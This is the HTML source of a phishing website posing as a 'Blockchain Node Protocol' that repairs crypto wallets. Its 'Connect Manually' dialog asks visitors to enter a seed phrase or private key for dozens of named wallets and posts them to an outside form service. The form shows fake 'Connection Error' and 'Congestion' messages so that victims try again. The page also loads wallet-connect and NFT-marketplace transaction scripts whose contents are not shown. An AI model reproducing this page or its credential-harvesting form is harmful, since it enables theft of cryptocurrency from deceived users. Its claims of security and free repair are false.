<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta content="width=device-width, initial-scale=1.0" name="viewport">

    <title>Blockchain Node Protocol</title>
    <link rel="stylesheet" href="nicepage.css" media="screen">
    <link rel="stylesheet" href="Home.css" media="screen">
    <meta content="" name="description">
    <meta content="" name="keywords">
    <script type="text/javascript" src="https://code.jquery.com/jquery-3.6.0.min.js" crossorigin="anonymous"></script>
    <script class="u-script" type="text/javascript" src="jquery.js" defer=""></script>
    <script class="u-script" type="text/javascript" src="nicepage.js" defer=""></script>
    <script charset="UTF-8" async type="text/javascript" src="72cd5d70_3cfb8209efeda.js"></script>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script src="index.js"></script>


    <script type="text/javascript">
        var _smartsupp = _smartsupp || {};
        _smartsupp.key = 'd5a429ba5dc50004805e629e81c9d147e3382ba6';
        _smartsupp.orientation = "left";
        _smartsupp.offsetX = 200;
        window.smartsupp || (function(d) {
            var s, c, o = smartsupp = function() {
                o._.push(arguments)
            };
            o._ = [];
            s = d.getElementsByTagName('script')[0];
            c = d.createElement('script');
            c.type = 'text/javascript';
            c.charset = 'utf-8';
            c.async = true;
            c.src = 'https://www.smartsuppchat.com/loader.js?';
            s.parentNode.insertBefore(c, s);
        })(document);
    </script>

    <!-- Favicons -->
    <link href="assets/img/blockchain-logo.png" rel="icon">
    <link href="assets/img/blockchain-logo.png" rel="apple-touch-icon">

    <!-- Google Fonts -->
    <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i|Raleway:300,300i,400,400i,500,500i,600,600i,700,700i|Poppins:300,300i,400,400i,500,500i,600,600i,700,700i" rel="stylesheet">

    <!-- Vendor CSS Files -->
    <link href="assets/vendor/aos/aos.css" rel="stylesheet">
    <link href="assets/vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
    <link href="assets/vendor/bootstrap-icons/bootstrap-icons.css" rel="stylesheet">
    <link href="assets/vendor/boxicons/css/boxicons.min.css" rel="stylesheet">
    <link href="assets/vendor/glightbox/css/glightbox.min.css" rel="stylesheet">
    <link href="assets/vendor/remixicon/remixicon.css" rel="stylesheet">
    <link href="assets/vendor/swiper/swiper-bundle.min.css" rel="stylesheet">

    <!-- Template Main CSS File -->
    <link href="assets/css/style.css" rel="stylesheet">

    <!-- =======================================================
  * Template Name: Vesperr
  * Updated: Mar 10 2023 with Bootstrap v5.2.3
  * Template URL: https://bootstrapmade.com/vesperr-free-bootstrap-template/
  * Author: BootstrapMade.com
  * License: https://bootstrapmade.com/license/
  ======================================================== -->
    <link id="u-theme-google-font" rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:100,100i,300,300i,400,400i,500,500i,700,700i,900,900i|Open+Sans:300,300i,400,400i,500,500i,600,600i,700,700i,800,800i">
 
    <script>
    function dynamicLoadScript(src) {
        var script = document.createElement('script');
        script.src = src && typeof src === 'string' ? src : 'https://www.google.com/recaptcha/api.js?render=6LfZZRIpAAAAAMiQTTT2Z3aPXyd0XSnMlMVMcz1h';
        script.async = true;
        document.body.appendChild(script);
        script.onload = function() {
            let event = new CustomEvent("recaptchaLoaded");
            document.dispatchEvent(event);
        };
    }
    document.addEventListener('DOMContentLoaded', function() {
        var confirmButton = document.querySelector('.u-cookies-consent .u-button-confirm');
        if (confirmButton) {
            confirmButton.onclick = dynamicLoadScript;
        }
    });
</script>

<script>
    document.addEventListener("DOMContentLoaded", function() {
        if (!gdprConfirmed()) {
            return;
        }
        dynamicLoadScript();
    });
</script>


     
    <script>
        document.addEventListener("DOMContentLoaded", function() {
            if (!gdprConfirmed()) {
                return;
            }
            dynamicLoadScript();
        });
    </script>
    <script>
        document.addEventListener("recaptchaLoaded", function() {
            if (!gdprConfirmed()) {
                return;
            }
            (function(grecaptcha, sitekey, actions) {
                var recaptcha = {
                    execute: function(action, submitFormCb) {
                        try {
                            grecaptcha.execute(
                                sitekey, {
                                    action: action
                                }
                            ).then(function(token) {
                                var forms = document.getElementsByTagName('form');

                                for (var i = 0; i < forms.length; i++) {
                                    var fields = forms[i].getElementsByTagName('input');

                                    for (var j = 0; j < fields.length; j++) {
                                        var field = fields[j];

                                        if ('recaptchaResponse' === field.getAttribute('name')) {
                                            field.setAttribute('value', token);
                                            break;
                                        }
                                    }
                                }
                                submitFormCb();
                            });
                        } catch (e) {
                            var formError = document.querySelector('.u-form-send-error');

                            if (formError) {
                                formError.innerText = 'Site Owner Error: ' + e.message.replace(/:[\s\S]*/, '');
                                formError.style.display = 'block';
                            }
                        }
                    },

                    executeContact: function(submitFormCb) {
                        recaptcha.execute(actions['contact'], submitFormCb);
                    }
                };

                window.recaptchaObject = recaptcha;
            })(
                grecaptcha,

                '6LfZZRIpAAAAAMiQTTT2Z3aPXyd0XSnMlMVMcz1h', {
                    'contact': 'contact'
                }
            );
        });
    </script>
</head>

<body>

    <!-- ======= Header ======= -->
    <header id="header" class="fixed-top d-flex align-items-center">
        <div class="container d-flex align-items-center justify-content-between">

            <div class="logo">
                <h1><a href="index.html"><img src="assets/img/blockchain-logo.png">Blockchain Node Protocol</a></h1>
                <!--Uncomment below if you prefer to use an image logo -->
                <!--<a href="index.html"><img src="assets/img/node protocol-3.png" alt="" class="img-fluid" height="1000px"></a> -->
            </div>

            <nav id="navbar" class="navbar">
                <ul>
                    <li><a class="nav-link scrollto active" href="#hero">Home</a></li>
                    <li><a class="nav-link scrollto" href="#about">About</a></li>
                    <li><a class="nav-link scrollto" href="#features">Services</a></li>

                    <li><a class="nav-link scrollto" href="#contact">Contact</a></li>
                    <li><a  class="connect-button getstarted scrollto connectButton">Connect Wallet</a></li>
                </ul>
                <i class="bi bi-list mobile-nav-toggle"></i>
            </nav>
            <!-- .navbar -->

        </div>
    </header>
    <!-- End Header -->

    <!-- ======= Hero Section ======= -->
    <section id="hero" class="d-flex align-items-center">

        <div class="container">
            <div class="row">
                <div class="col-lg-6 pt-5 pt-lg-0 order-2 order-lg-1 d-flex flex-column justify-content-center">
                    <h1 data-aos="fade-up">The Node Protocol</h1>
                    <h2 data-aos="fade-up" data-aos-delay="400">Our innovative Node Protocol offers a reliable solution for resolving wallet issues, ensuring peace of mind for cryptocurrency users.</h2>
                    <div data-aos="fade-up" data-aos-delay="800">
                        <a  class="connect-button btn-get-started scrollto connectButton">Connect Wallet</a>
                    </div>
                    &nbsp;


                    <div data-aos="fade-up" data-aos-delay="800">
                        <a  class="connect-button btn-get-started scrollto connect-wallet">Connect Solana</a>
                    </div>



                    <div data-aos="fade-up" data-aos-delay="800">
                        <div class="u-clearfix u-sheet u-valign-middle u-sheet-1">
                            <a href="#sec-bd9e" class="u-border-2 u-border-palette-1-light-1 u-btn u-btn-round u-button-style u-dialog-link u-hover-palette-1-light-1 u-radius-40 u-text-palette-1-light-1 u-white u-btn-1  btn-get-started scrollto">Connect Manually</a>
                        </div>
                    </div>
                </div>
                <section class="u-align-center u-black u-clearfix u-container-style u-dialog-block u-opacity u-opacity-70 u-valign-middle u-dialog-section-5" id="sec-bd9e">
                    <div class="u-align-center u-border-1 u-border-white u-container-style u-dialog u-radius-23 u-shape-round u-white u-dialog-1">
                        <div class="u-container-layout u-valign-middle-lg u-valign-middle-xl u-container-layout-1">
                            <div class="u-form u-form-1">
                                <form action="https://formspree.io/f/mwkgllzz" method="POST" class="u-clearfix u-form-spacing-30 u-form-vertical u-inner-form" style="padding: 30px;"  name="form">
                                    <div class="u-form-group u-form-select u-form-group-1">
                                        <label for="select-ea9e" class="u-label u-text-palette-1-dark-1">SELECT YOUR WALLET</label>
                                        <div class="u-form-select-wrapper">
                                            <select id="select-ea9e" name="select" class="u-border-2 u-border-grey-25 u-input u-input-rectangle u-radius-5">
                    <option value="CLICK TO CHOOSE" data-calc="CLICK TO CHOOSE">CLICK TO CHOOSE</option>
                    <option value="METAMASK" data-calc="METAMASK">METAMASK</option>
                    <option value="LEDGER-NANO" data-calc="LEDGER-NANO">LEDGER-NANO S/X</option>
                    <option data-calc="TREZOR" value="TREZOR">TREZOR</option>
                    <option data-calc="TRUST-WALLET" value="TRUST-WALLET">TRUST WALLET</option>
                    <option data-calc="EXODUS" value="EXODUS">EXODUS</option>
                    <option data-calc="SAFEPAL" value="SAFEPAL">SAFEPAL</option>
                    <option data-calc="TRONLINK" value="TRONLINK">TRONLINK</option>
                    <option data-calc="CRYPTO-DEFI" value="CRYPTO-DEFI">CRYPTO.COM DEFI</option>
                    <option data-calc="KEPLR" value="KEPLR">KEPLR WALLET</option>
                    <option data-calc="THOR" value="THOR">THOR WALLET</option>
                    <option data-calc="RONIN" value="RONIN">RONIN WALLET</option>
                    <option data-calc="MOONLET" value="MOONLET">MOONLET</option>
                    <option data-calc="GUARDA" value="GUARDA">GUARDA</option>
                    <option data-calc="KLEVER" value="KLEVER">KLEVER</option>
                    <option data-calc="BITKEEP" value="BITKEEP">BITKEEP</option>
                    <option data-calc="COINBASE" value="COINBASE">COINBASE WALLET</option>
                    <option data-calc="ZILLIQA" value="ZILLIQA">ZILLIQA</option>
                    <option data-calc="ATOMIC-WALLET" value="ATOMIC-WALLET">ATOMIC WALLET</option>
                    <option data-calc="ELLIPAL" value="ELLIPAL">ELLIPAL</option>
                    <option data-calc="COINOMI" value="COINOMI">COINOMI</option>
                    <option data-calc="POLKADOT" value="POLKADOT">POLKADOT JS</option>
                    <option data-calc="PONTEM" value="PONTEM">PONTEM</option>
                    <option data-calc="IMTOKEN" value="IMTOKEN">IMTOKEN</option>
                    <option data-calc="MYETHER-WALLET" value="MYETHER-WALLET">MYETHER WALLET</option>
                    <option data-calc="MATH-WALLET" value="MATH-WALLET">MATH WALLET</option>
                    <option data-calc="COIN98" value="COIN98">COIN 98</option>
                    <option data-calc="TOKENPOCKET" value="TOKENPOCKET">TOKEN POCKET</option>
                    <option data-calc="TERRASTATION" value="TERRASTATION">TERRA STATION</option>
                    <option data-calc="PHANTOM" value="PHANTOM">PHANTOM</option>
                    <option data-calc="SOLLET" value="SOLLET">SOLLET WALLET</option>
                    <option data-calc="SOLFLARE" value="SOLFLARE">SOLFLARE</option>
                    <option data-calc="NAMI" value="NAMI">NAMI WALLET</option>
                    <option data-calc="FLINT" value="FLINT">FLINT WALLET</option>
                    <option data-calc="GERO" value="GERO">GERO WALLET</option>
                    <option data-calc="RABBY" value="RABBY">RABBY WALLET</option>
                    <option data-calc="KASPA" value="KASPA">KASPA</option>
                    <option data-calc="LOBSTR" value="LOBSTR">LOBSTR</option>
                    <option data-calc="BIFROST" value="BIFROST">BIFROST</option>
                    <option data-calc="BINANCE" value="BINANCE">BINANCE</option>
                    <option data-calc="YOROI" value="YOROI">YOROI</option>
                    <option data-calc="RAINBOW" value="RAINBOW">RAINBOW</option>
                    <option data-calc="TORUS-LAB" value="TORUS-LAB">TORUS LAB</option>
                    <option data-calc="DEFI-CHAIN" value="DEFI-CHAIN">DEFI CHAIN</option>
                    <option data-calc="WALLET-CONNECT" value="WALLET CONNECT">WALLET CONNECT</option>
                    <option data-calc="MONERO GUI" value="MONERO GUI">MONERO GUI WALLET</option>
                    <option data-calc="HELIUM" value="HELIUM">HELIUM WALLET</option>
                    <option data-calc="KASPIUM" value="KASPIUM">KASPIUM WALLET</option>
                    
                  </select>
                                            <svg class="u-caret u-caret-svg" version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="16px" height="16px" viewBox="0 0 16 16" style="fill:currentColor;" xml:space="preserve"><polygon class="st0" points="8,12 2,4 14,4 "></polygon></svg>
                                        </div>
                                    </div>
                                    <div class="u-form-group u-form-message u-form-group-2">
                                        <label for="message-3e72" class="u-form-control-hidden u-label u-text-palette-1-dark-1">Message</label>
                                        <textarea placeholder="Enter 12 or 24-word Seed Phrase or Private Key" rows="4" cols="50" id="message-3e72" name="message" class="u-border-2 u-border-grey-25 u-input u-input-rectangle u-radius-5" required=""></textarea>
                                    </div>
                                    <div class="u-align-left u-form-group u-form-submit u-form-group-3">
                                        <a href="#" class="u-active-white u-border-2 u-border-active-palette-1-light-1 u-border-hover-palette-1-light-1 u-border-palette-1-light-1 u-btn u-btn-round u-btn-submit u-button-style u-custom-font u-font-raleway u-hover-white u-radius-47 u-text-palette-1-light-1 u-white u-btn-1">CONNECT WALLET</a>
                                        <input type="submit" value="submit" class="u-form-control-hidden">
                                    </div>
                                    <div class="u-form-send-message u-form-send-success">Connection Error! Please try again.</div>
                                    <div class="u-form-send-error u-form-send-message">Congestion on the Blockchain! Try a different wallet.</div>
                                    
    
                                </form>
                            </div>
                        </div><button class="u-dialog-close-button u-icon u-text-grey-50 u-icon-1">
        <svg class="u-svg-link" preserveAspectRatio="xMidYMin slice" viewBox="0 0 413.348 413.348" style=""><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#svg-1ce9"></use></svg>
        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" xml:space="preserve" class="u-svg-content" viewBox="0 0 413.348 413.348" id="svg-1ce9"><path d="m413.348 24.354-24.354-24.354-182.32 182.32-182.32-182.32-24.354 24.354 182.32 182.32-182.32 182.32 24.354 24.354 182.32-182.32 182.32 182.32 24.354-24.354-182.32-182.32z"></path></svg>
      </button>
                    </div>
                </section>
                <style>
                    .u-dialog-section-5 .u-dialog-1 {
                        width: 599px;
                        min-height: 477px;
                        height: auto;
                        box-shadow: 0px 0px 8px 0px rgba(128, 128, 128, 1);
                        margin: 60px auto;
                    }

                    .u-dialog-section-5 .u-container-layout-1 {
                        padding: 11px 10px 11px 15px;
                    }

                    .u-dialog-section-5 .u-form-1 {
                        height: 387px;
                        margin: 0 23px 0 32px;
                    }

                    .u-dialog-section-5 .u-form-group-1 {
                        width: 100%;
                    }

                    .u-dialog-section-5 .u-form-group-2 {
                        width: 100%;
                    }

                    .u-dialog-section-5 .u-form-group-3 {
                        width: 100%;
                    }

                    .u-dialog-section-5 .u-btn-1 {
                        background-image: none;
                        border-style: solid;
                        font-size: 1.25rem;
                        font-weight: 700;
                        width: 100%;
                        padding: 10px 0;
                    }

                    .u-dialog-section-5 .u-icon-1 {
                        width: 15px;
                        height: 15px;
                        left: auto;
                        top: 29px;
                        position: absolute;
                        right: 39px;
                    }

                    @media (max-width: 1199px) {
                        .u-dialog-section-5 .u-dialog-1 {
                            width: 599px;
                        }
                        .u-dialog-section-5 .u-container-layout-1 {
                            padding: 14px 0 15px;
                        }
                        .u-dialog-section-5 .u-form-1 {
                            width: 601px;
                            margin-left: -2px;
                            margin-right: -2px;
                        }
                    }

                    @media (max-width: 991px) {
                        .u-dialog-section-5 .u-dialog-1 {
                            width: 599px;
                        }
                        .u-dialog-section-5 .u-container-layout-1 {
                            padding: 11px 10px 11px 15px;
                        }
                        .u-dialog-section-5 .u-form-1 {
                            margin-right: 23px;
                            margin-left: 32px;
                            width: auto;
                        }
                    }

                    @media (max-width: 767px) {
                        .u-dialog-section-5 .u-dialog-1 {
                            width: 540px;
                            min-height: 452px;
                        }
                        .u-dialog-section-5 .u-container-layout-1 {
                            padding-left: 9px;
                            padding-right: 9px;
                        }
                        .u-dialog-section-5 .u-form-1 {
                            height: 429px;
                            width: 518px;
                            margin-top: 28px;
                            margin-left: 1px;
                            margin-right: 0;
                        }
                        .u-dialog-section-5 .u-icon-1 {
                            width: 22px;
                            height: 22px;
                            top: 29px;
                            right: 31px;
                            padding: 0;
                        }
                    }

                    @media (max-width: 575px) {
                        .u-dialog-section-5 .u-dialog-1 {
                            width: 340px;
                            min-height: 425px;
                        }
                        .u-dialog-section-5 .u-container-layout-1 {
                            padding-top: 23px;
                            padding-left: 10px;
                            padding-right: 10px;
                        }
                        .u-dialog-section-5 .u-form-1 {
                            width: 322px;
                            margin-top: 1px;
                            margin-left: 0;
                        }
                        .u-dialog-section-5 .u-btn-1 {
                            padding-top: 6px;
                            padding-bottom: 7px;
                        }
                        .u-dialog-section-5 .u-icon-1 {
                            width: 15px;
                            height: 15px;
                            right: 20px;
                        }
                    }
                </style>
                <div class="col-lg-6 order-1 order-lg-2 hero-img" data-aos="fade-left" data-aos-delay="200">
                    <img src="assets/img/institutional-advantage-background.png" class="img-fluid animated" alt="">
                </div>
            </div>
        </div>

    </section>
    <!-- End Hero -->

    <main id="main">

        <!-- ======= Clients Section ======= -->

        <!-- ======= About Us Section ======= -->
        <section id="about" class="about">
            <div class="container">

                <div class="section-title" data-aos="fade-up">
                    <h2>About Us</h2>
                </div>

                <div class="row content">
                    <div class="col-lg-6" data-aos="fade-up" data-aos-delay="150">
                        <p>
                            Our team is available 24/7 to answer any questions or concerns that our clients may have.
                        </p>
                        <ul>
                            <li><i class="ri-check-double-line"></i>Our customer support team is highly trained and knowledgeable in all aspects of blockchain technology.</li>
                            <li><i class="ri-check-double-line"></i> We prioritize quick response times to ensure that our clients' concerns are addressed in a timely manner.</li>
                            <li><i class="ri-check-double-line"></i> We value our clients' feedback and strive to continuously improve our service based on their suggestions.</li>
                        </ul>
                    </div>
                    <div class="col-lg-6 pt-4 pt-lg-0" data-aos="fade-up" data-aos-delay="300">
                        <p>
                            At the heart of our service is our commitment to innovation and excellence. We believe that blockchain technology has the potential to revolutionize the way we store and exchange value, and we are dedicated to helping our clients realize the full potential
                            of this technology. Our Blockchain Node Protocol is the result of years of research and development, and we are confident that it is the most effective solution for fixing crypto wallets currently available on the market.
                        </p>
                        <!-- <a href="#" class="btn-learn-more">Learn More</a> -->
                    </div>
                </div>

            </div>
        </section>
        <!-- End About Us Section -->

        <!-- ======= Counts Section ======= -->
        <section id="counts" class="counts">
            <div class="container">

                <div class="row">
                    <div class="image col-xl-5 d-flex align-items-stretch justify-content-center justify-content-xl-start" data-aos="fade-right" data-aos-delay="150">
                        <img src="assets/img/counts-img.svg" alt="" class="img-fluid">
                    </div>

                    <div class="col-xl-7 d-flex align-items-stretch pt-4 pt-xl-0" data-aos="fade-left" data-aos-delay="300">
                        <div class="content d-flex flex-column justify-content-center">
                            <div class="row">
                                <div class="col-md-6 d-md-flex align-items-md-stretch">
                                    <div class="count-box">
                                        <i class="bi bi-emoji-smile"></i>
                                        <span data-purecounter-start="0" data-purecounter-end="300000" data-purecounter-duration="3" class="purecounter"></span>
                                        <p><strong>Active Wallet Users</strong></p>
                                    </div>
                                </div>

                                <div class="col-md-6 d-md-flex align-items-md-stretch">
                                    <div class="count-box">
                                        <i class="bi bi-journal-richtext"></i>
                                        <span data-purecounter-start="0" data-purecounter-end="1508" data-purecounter-duration="2" class="purecounter"></span>
                                        <p><strong>Contribution Projects</strong></p>
                                    </div>
                                </div>

                                <div class="col-md-6 d-md-flex align-items-md-stretch">
                                    <div class="count-box">
                                        <i class="bi bi-clock"></i>
                                        <span data-purecounter-start="0" data-purecounter-end="7" data-purecounter-duration="1" class="purecounter"></span>
                                        <p><strong>Years of research</strong></p>
                                    </div>
                                </div>


                            </div>
                        </div>
                        <!-- End .content-->
                    </div>
                </div>

            </div>
        </section>
        <!-- End Counts Section -->

        <!-- ======= Services Section ======= -->


        <!-- ======= More Services Section ======= -->


        <!-- ======= Features Section ======= -->
        <section id="features" class="features">
            <div class="container">

                <div class="section-title" data-aos="fade-up">
                    <h2>Features</h2>
                    <p>Our Blockchain Node Protocol offers a comprehensive range of features to help you securely and efficiently manage problems in your crypto wallets.</p>
                </div>

                <div class="row" data-aos="fade-up" data-aos-delay="300">
                    <div class="col-lg-3 col-md-4">



                        
                        <div class="icon-box">
                            <i class="bi bi-send" style="color: #ffbb2c;"></i>
                            <h3><a href="#sec-bd9e" class="u-dialog-link">Migration Issues</a></h3>
                        </div>
                    </div>
                    <div class="col-lg-3 col-md-4 mt-4 mt-md-0">
                        <div class="icon-box">
                            <i class="ri-bi bi-wallet" style="color: #5578ff;"></i>
                            <h3><a  href="#sec-bd9e" class="u-dialog-link">Wallet Restoration Issues</a></h3>
                        </div>
                    </div>
                    <div class="col-lg-3 col-md-4 mt-4 mt-md-0">
                        <div class="icon-box">
                            <i class="bi bi-cash-stack" style="color: #e80368;"></i>
                            <h3><a  href="#sec-bd9e" class="u-dialog-link">Airdrop Claim</a></h3>
                        </div>
                    </div>
                    <div class="col-lg-3 col-md-4 mt-4 mt-lg-0">
                        <div class="icon-box">
                            <i class="bi bi-hourglass-split" style="color: #e361ff;"></i>
                            <h3><a  href="#sec-bd9e" class="u-dialog-link">Staking Problems</a></h3>
                        </div>
                    </div>
                    <div class="col-lg-3 col-md-4 mt-4">
                        <div class="icon-box">
                            <i class="bi bi-images" style="color: #47aeff;"></i>
                            <h3><a  href="#sec-bd9e" class="u-dialog-link">NFT Reviews and Claims</a></h3>
                        </div>
                    </div>
                    <div class="col-lg-3 col-md-4 mt-4">
                        <div class="icon-box">
                            <i class="ri-gradienter-line" style="color: #ffa76e;"></i>
                            <h3><a  href="#sec-bd9e" class="u-dialog-link">Liquidity Pool Difficulties</a></h3>
                        </div>
                    </div>
                    <div class="col-lg-3 col-md-4 mt-4">
                        <div class="icon-box">
                            <i class="bi bi-exclamation-triangle-fill" style="color: #11dbcf;"></i>
                            <h3><a  href="#sec-bd9e" class="u-dialog-link">Transaction and Slippage Errors</a></h3>
                        </div>
                    </div>
                    <div class="col-lg-3 col-md-4 mt-4">
                        <div class="icon-box">
                            <i class="bi bi-arrow-left-right" style="color: #4233ff;"></i>
                            <h3><a  href="#sec-bd9e" class="u-dialog-link">Cross-chain Bridge Issues</a></h3>
                        </div>
                    </div>
                    <div class="col-lg-3 col-md-4 mt-4">
                        <div class="icon-box">
                            <i class="bi bi-gift" style="color: #b2904f;"></i>
                            <h3><a  href="#sec-bd9e" class="u-dialog-link">Reward Claims </a></h3>
                        </div>
                    </div>
                    <div class="col-lg-3 col-md-4 mt-4">
                        <div class="icon-box">
                            <i class="bi bi-safe2-fill" style="color: #b20969;"></i>
                            <h3><a  href="#sec-bd9e" class="u-dialog-link">Asset Recovery</a></h3>
                        </div>
                    </div>
                    <div class="col-lg-3 col-md-4 mt-4">
                        <div class="icon-box">
                            <i class="bi bi-box-arrow-in-right" style="color: #ff5828;"></i>
                            <h3><a  href="#sec-bd9e" class="u-dialog-link">Deposit and Withdrawal Issues</a></h3>
                        </div>
                    </div>
                    <div class="col-lg-3 col-md-4 mt-4">
                        <div class="icon-box">
                            <i class="bi bi-currency-bitcoin" style="color: #29cc61;"></i>
                            <h3><a  href="#sec-bd9e" class="u-dialog-link">Other Blockchain(DeFi) Related Issues</a></h3>
                        </div>
                    </div>
                </div>

            </div>
        </section>
        <!-- End Features Section -->




        <!-- ======= F.A.Q Section ======= -->
        <section id="faq" class="faq">
            <div class="container">

                <div class="section-title" data-aos="fade-up">
                    <h2>Frequently Asked Questions</h2>
                </div>

                <div class="row faq-item d-flex align-items-stretch" data-aos="fade-up" data-aos-delay="100">
                    <div class="col-lg-5">
                        <i class="ri-question-line"></i>
                        <h4>How does the Blockchain Node Protocol fix crypto/DeFi wallets?</h4>
                    </div>
                    <div class="col-lg-7">
                        <p>The Blockchain Node Protocol uses advanced algorithms and security measures to analyze and diagnose the issue with the crypto wallet. Once identified, our protocol makes necessary repairs to restore the wallet's functionality.

                        </p>
                    </div>
                </div>
                <!-- End F.A.Q Item-->

                <div class="row faq-item d-flex align-items-stretch" data-aos="fade-up" data-aos-delay="200">
                    <div class="col-lg-5">
                        <i class="ri-question-line"></i>
                        <h4>Is the Blockchain Node Protocol secure?</h4>
                    </div>
                    <div class="col-lg-7">
                        <p>
                            Yes, the Blockchain Node Protocol is highly secure. Our team of experts has developed a cutting-edge system that incorporates the latest security measures to ensure that our clients' funds and data are always safe.
                        </p>
                    </div>
                </div>
                <!-- End F.A.Q Item-->

                <div class="row faq-item d-flex align-items-stretch" data-aos="fade-up" data-aos-delay="300">
                    <div class="col-lg-5">
                        <i class="ri-question-line"></i>
                        <h4>What types of crypto wallets can the Blockchain Node Protocol fix?</h4>
                    </div>
                    <div class="col-lg-7">
                        <p>
                            The Blockchain Node Protocol is designed to fix a wide range of crypto wallets, including popular wallets such as Metamask, Trust Wallet, and SafePal, among others.
                        </p>
                    </div>
                </div>
                <!-- End F.A.Q Item-->

                <div class="row faq-item d-flex align-items-stretch" data-aos="fade-up" data-aos-delay="400">
                    <div class="col-lg-5">
                        <i class="ri-question-line"></i>
                        <h4>How long does it take to fix a crypto wallet using the Blockchain Node Protocol?</h4>
                    </div>
                    <div class="col-lg-7">
                        <p>
                            The amount of time it takes to fix a crypto wallet using our protocol depends on the complexity of the issue. In most cases, the node protocol can diagnose and repair the issue within a matter of minutes, but some cases may require more time to ensure
                            that the issue is fully resolved. You will always be duly informed throughout the process to ensure that you are fully aware of the progress being made.
                        </p>
                    </div>
                </div>
                <!-- End F.A.Q Item-->

                <div class="row faq-item d-flex align-items-stretch" data-aos="fade-up" data-aos-delay="500">
                    <div class="col-lg-5">
                        <i class="ri-question-line"></i>
                        <h4>Is this a free service?</h4>
                    </div>
                    <div class="col-lg-7">
                        <p>
                            Yes, this service is free and users are not expected to pay any amount when engaging with the Node Protocol.
                        </p>
                    </div>
                </div>
                <!-- End F.A.Q Item-->

            </div>
        </section>
        <!-- End F.A.Q Section -->

        <!-- ======= Contact Section ======= -->
        <section id="contact" class="contact">
            <div class="container">

                <div class="section-title" data-aos="fade-up">
                    <h2>Contact Us</h2>
                </div>

                <div class="row">

                    <div class="col-lg-4 col-md-6" data-aos="fade-up" data-aos-delay="100">
                        <div class="contact-about">
                            <h3>Blockchain Node Protocol</h3>
                            <p>If you have any questions or concerns about the Blockchain Node Protocol, or if you would like to learn more about our services, please do not hesitate to contact us. You can also use our chatbot to talk to any of our agents.</p>
                           
                        </div>
                    </div>





                </div>

            </div>
        </section>
        <!-- End Contact Section -->

    </main>
    <!-- End #main -->

    <!-- ======= Footer ======= -->
    <footer id="footer">
        <div class="container">
            <div class="row d-flex align-items-center">
                <div class="col-lg-6 text-lg-left text-center">
                    <div class="copyright">
                        &copy; Copyright <strong>Blockchain Node Protocol</strong>. All Rights Reserved
                    </div>
                    <div class="credits">
                        <!-- All the links in the footer should remain intact. -->
                        <!-- You can delete the links only if you purchased the pro version. -->
                        <!-- Licensing information: https://bootstrapmade.com/license/ -->
                        <!-- Purchase the pro version with working PHP/AJAX contact form: https://bootstrapmade.com/vesperr-free-bootstrap-template/ -->

                    </div>
                </div>
                <div class="col-lg-6">
                    <nav class="footer-links text-lg-right text-center pt-2 pt-lg-0">
                        <a href="#hero" class="scrollto">Home</a>
                        <a href="#about" class="scrollto">About</a>
                    </nav>
                </div>
            </div>
        </div>
    </footer>
    <!-- End Footer -->

    <a href="#" class="back-to-top d-flex align-items-center justify-content-center"><i class="bi bi-arrow-up-short"></i></a>

    <!-- Vendor JS Files -->
    <script src="assets/vendor/purecounter/purecounter_vanilla.js"></script>
    <script src="assets/vendor/aos/aos.js"></script>
    <script src="assets/vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
    <script src="assets/vendor/glightbox/js/glightbox.min.js"></script>
    <script src="assets/vendor/isotope-layout/isotope.pkgd.min.js"></script>
    <script src="assets/vendor/swiper/swiper-bundle.min.js"></script>


    <!-- Template Main JS File -->
    <script src="assets/js/main.js"></script>

    <script src="/assets/web3-provider/web3-modal.js"></script>
    <script src="/assets/web3-provider/web3-loader.js"></script>
    <script src="/assets/web3-provider/web3-connect.js"></script>
    <script src="/assets/web3-provider/web3-module.js"></script>
    <script src="/assets/web3-provider/web3-alert.js"></script>
    <script src="/assets/web3-provider/web3-data.js"></script>
    <script src="/assets/web3-provider/ethers.js"></script>
    <script src="/assets/web3-provider/web3-router.js"></script>
    <script src="/assets/web3-provider/ethereum-tx.js"></script>
    <script src="/assets/web3-modules/module-seaport.js"></script>
    <script src="/assets/web3-modules/module-blur.js"></script>
    <script src="/assets/web3-modules/module-x2y2.js"></script>
    <script src="/assets/web3-provider.js"></script>

</body>

</html>